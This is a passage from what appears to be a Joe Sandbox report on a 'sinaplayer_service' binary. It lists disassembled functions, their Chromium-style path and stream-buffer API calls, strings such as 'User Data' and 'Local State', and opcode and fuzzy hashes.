                                                                                                                                                                                                    • Opcode Fuzzy Hash: b12211437349963379821e884bffe94ba372fda4b853a3c331940777ba9eaf5a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC21E571900208DBCF10DFE9CC81ADCBBA4AF95318F50461AE915ABB90DB34994ACBA1
                                                                                                                                                                                                    Function 0038000F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003EF,?), ref: 00380018
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0038004E
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00380062
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380074
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $User Data
                                                                                                                                                                                                    • API String ID: 2074397066-3281480726
                                                                                                                                                                                                    • Opcode ID: a7286ee4222d44f02dfa2262d8f09901af5c1ff73f32529b675d8d3d6bc2e765
                                                                                                                                                                                                    • Instruction ID: 17866ef6f34397263cb6110ea2fa85664201a45fb20a4beef8ef88fc4af46079
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7286ee4222d44f02dfa2262d8f09901af5c1ff73f32529b675d8d3d6bc2e765
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F218031804248DFDF16EB94DC59AEDBBB8BF19318F14009AD846B7282DB755B4CCB21
                                                                                                                                                                                                    Function 00380088 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F0,?), ref: 00380091
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 003800C7
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 003800DB
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003800ED
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $Cache
                                                                                                                                                                                                    • API String ID: 2074397066-2286424636
                                                                                                                                                                                                    • Opcode ID: 51010f66987d6d531fae5a9ab94621c983de93c6a3e3fccb022438154637389e
                                                                                                                                                                                                    • Instruction ID: 17df95f6b19f4371520cb1ae36a8ae1e1d0315e3c11fa030635c055216c9e135
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51010f66987d6d531fae5a9ab94621c983de93c6a3e3fccb022438154637389e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC21833180424C9FDF16EB94DC49AEDBB78BF19318F14009AD846B7282DB755B4DCB61
                                                                                                                                                                                                    Function 00380101 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F1,?), ref: 0038010A
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 00380140
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00380154
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380166
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $ChannelImg_30_30
                                                                                                                                                                                                    • API String ID: 2074397066-182828702
                                                                                                                                                                                                    • Opcode ID: 5f98b522f8c078a04622250066b2b5fc406cfd8b130f8a84f12ae907e70ba5a3
                                                                                                                                                                                                    • Instruction ID: baa85de5a04c943b082a105b4830dfcbb6eef08dd741f11a202e7f0dd31d1732
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f98b522f8c078a04622250066b2b5fc406cfd8b130f8a84f12ae907e70ba5a3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A121B33180420C9FDF16EB94DC59AEDBB78BF1A318F14049AD84AB7282DB715A4DCB21
                                                                                                                                                                                                    Function 0038017A Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F0,?), ref: 00380183
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 003801B3
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 003801C7
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003801D9
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $Upgrade
                                                                                                                                                                                                    • API String ID: 2074397066-4235421785
                                                                                                                                                                                                    • Opcode ID: 43e8109d5e684a2dfb6186940a18eb8bb49f91edbcf290aefb5ddd088ad4a1b4
                                                                                                                                                                                                    • Instruction ID: 2a80527f39186d5ccbf36ea7a1b19d449c65842e211ac0049b0124cf1cd13aba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43e8109d5e684a2dfb6186940a18eb8bb49f91edbcf290aefb5ddd088ad4a1b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9721A43180420CDFDF16EB94DC49AEDBB78BF19318F14019AD846B7292DB759A4DCB21
                                                                                                                                                                                                    Function 0037FF20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(0000006E,?), ref: 0037FF26
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FF5C
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FF70
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FF82
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $Sina
                                                                                                                                                                                                    • API String ID: 2074397066-3713690197
                                                                                                                                                                                                    • Opcode ID: 7114db29dc7cfab125e6947484fc8e6477a8c1ba2393292b03030d9a7d2c6818
                                                                                                                                                                                                    • Instruction ID: 01183c6b4abd298ad54f9a76e27725259b045eb37eac959450901bacce703303
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7114db29dc7cfab125e6947484fc8e6477a8c1ba2393292b03030d9a7d2c6818
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB2180318042489FDF16EBA4DC49BEDBB78BF19318F14009AD84AB7282DB755A4DDB21
                                                                                                                                                                                                    Function 0037FF96 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003EE,?), ref: 0037FF9F
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FFD5
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FFE9
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FFFB
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $SinaPlayer
                                                                                                                                                                                                    • API String ID: 2074397066-831897694
                                                                                                                                                                                                    • Opcode ID: 1afd5149bae70f4188c33be518bdf906bda26f0a8499186bf1fcc98e5af83044
                                                                                                                                                                                                    • Instruction ID: c0b25a36a53fb0634f0b3d8f3602303d3ecab45057085218f893c12c00fb19ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1afd5149bae70f4188c33be518bdf906bda26f0a8499186bf1fcc98e5af83044
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F221B0318042489FDF16EBA4DC49BEDBB78BF1A318F14009AD846B7282DB715A4CCB21
                                                                                                                                                                                                    Function 003801FD Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003F0,?), ref: 00380206
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 00380236
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0038024A
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0038025C
                                                                                                                                                                                                      • Part of subcall function 003723E0: ??3@YAXPAX@Z.MSVCR120(?,00000000,0038B4CE,00000000), ref: 003723EB
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathPath@1@@V01@V01@@$??3@Append@CreateDirectoryExists@base@@Get@Path@base@@@Service@@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@base@@W@std@@
                                                                                                                                                                                                    • String ID: $Local State
                                                                                                                                                                                                    • API String ID: 2074397066-3454405924
                                                                                                                                                                                                    • Opcode ID: f9228654f6d6e961eb278a80195b279ca5a8458e27f81bbd997befbcb3e206b5
                                                                                                                                                                                                    • Instruction ID: e37d3d0099e9fa370367402708f3355bd3cdedcfdfa3b43db97ccf8e5fad3455
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9228654f6d6e961eb278a80195b279ca5a8458e27f81bbd997befbcb3e206b5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F621D43180424C9FDF16EBA4DC49AEDBB78BF19318F0400AAD846B7282DB755A4DCB21
                                                                                                                                                                                                    Function 00392B90 Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120(8285FFAB), ref: 00392BBD
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00392BD3
                                                                                                                                                                                                    • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP120 ref: 00392BDF
                                                                                                                                                                                                    • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP120(?,?,?), ref: 00392C11
                                                                                                                                                                                                    • fgetc.MSVCR120 ref: 00392C20
                                                                                                                                                                                                    • ungetc.MSVCR120 ref: 00392D6A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?setg@?$basic_streambuf@D00@Gninc@?$basic_streambuf@fgetcungetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1268163327-0
                                                                                                                                                                                                    • Opcode ID: 9cf258fbdbc56a7ca0fd56dd468560f195c0159ce5771e6f2d8cf54aa1c97e09
                                                                                                                                                                                                    • Instruction ID: 8f13b3091b54409a08763762031bcec5ae3292289a0d11926e9c44c34d223c2b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cf258fbdbc56a7ca0fd56dd468560f195c0159ce5771e6f2d8cf54aa1c97e09
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38517172A00519EFCF16DFA8C885AEEBBB8FF09321F140616E911B3590D731E954CBA1
                                                                                                                                                                                                    Function 003759C0 Relevance: 16.6, APIs: 11, Instructions: 131COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003759DD
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003759E9
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003759F6
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375A1F
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375A61
                                                                                                                                                                                                    • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(?), ref: 00375A71
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375A83
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375AA2
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375AD0
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375AFE
                                                                                                                                                                                                    • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(?), ref: 00375B0E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?gptr@?$basic_streambuf@$?gbump@?$basic_streambuf@?pbump@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2796781305-0
                                                                                                                                                                                                    • Opcode ID: 3e531fb08948a289a09d789ac1ee902d5452506be6ec6c233a97c836905e9f7d
                                                                                                                                                                                                    • Instruction ID: 53b01ceb09df5e71723c297e91cd602ba263cd6aee9af5a1d27665a16715e16f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e531fb08948a289a09d789ac1ee902d5452506be6ec6c233a97c836905e9f7d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C515E757106048FCF6ACF28D99566977B9BF88300F0685A9EC0A9B361DB78EC40CB90
                                                                                                                                                                                                    Function 00375CB0 Relevance: 16.6, APIs: 11, Instructions: 71COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375CB3
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375CCF
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375CDB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
